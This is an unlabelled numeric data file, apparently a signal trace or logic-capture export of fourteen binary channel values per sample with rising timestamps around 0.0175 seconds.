1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545652e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545656e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545700e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545752e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545772e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545800e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545804e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545828e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545852e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545876e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545900e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545924e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545952e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545972e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546000e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546052e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546076e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546100e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546104e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546152e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546172e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546200e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546252e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546276e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546300e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546308e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546324e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546352e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546372e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546400e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546404e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546428e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546452e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546460e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546500e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546524e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546552e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546600e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546624e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546652e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7546676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7546700e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546708e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546748e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546800e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546824e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546900e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7546948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7546972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547052e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547100e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547176e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547200e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547224e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547252e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547300e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547304e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547324e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547348e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547372e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547400e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547424e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547452e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547500e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547524e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547556e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547600e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547624e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547652e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547700e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547724e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547748e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547772e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547800e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7547824e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7547852e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547856e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547900e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547924e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7547948e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7547972e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548000e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548024e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548052e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548076e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548100e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548148e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548172e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548200e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548204e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548224e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548252e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548300e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548504e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548580e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548604e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548656e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548680e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548732e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548756e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7548828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7548852e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548860e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548880e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548904e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548932e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7548956e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7548980e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549004e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7549028e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549060e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549080e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549104e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549132e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549156e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549180e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549204e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7549208e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549212e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7549228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549252e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7549280e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549304e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7549332e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549356e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7549380e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7549404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549412e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549480e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549504e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549652e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549856e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549880e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7549956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7549980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550004e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550052e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550080e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550104e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550132e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550156e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550180e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550204e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550228e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550260e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550460e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550504e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550528e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550572e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550640e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550660e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550684e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550708e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550732e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550752e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550772e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550796e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550820e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550844e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550864e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550888e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7550956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7550980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551080e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551104e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551228e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7551252e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7551276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7675684e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7675860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7675884e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,1.7675912e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7675932e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676248e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7676272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7676324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7676372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7676420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676448e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7676472e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7676500e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676516e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676648e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676672e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676848e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676872e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7676972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7676996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677048e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677248e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677448e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677472e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677496e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677648e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677800e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677824e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7677948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7677972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678000e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678024e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678200e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678224e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678400e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678424e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678552e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678600e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678624e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7678652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678676e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678684e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678700e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678724e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678752e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678772e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678800e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678824e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678852e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678876e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678900e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678924e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7678952e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7678972e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7678984e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679000e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679024e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679152e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679200e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679224e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679352e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679400e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679424e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679552e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679600e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679624e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679800e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679928e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7679952e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7679980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680076e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680084e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680100e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680128e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680152e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680180e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680204e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680228e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680252e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680276e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680300e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680328e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7680352e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7680380e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680384e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680552e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680604e-02 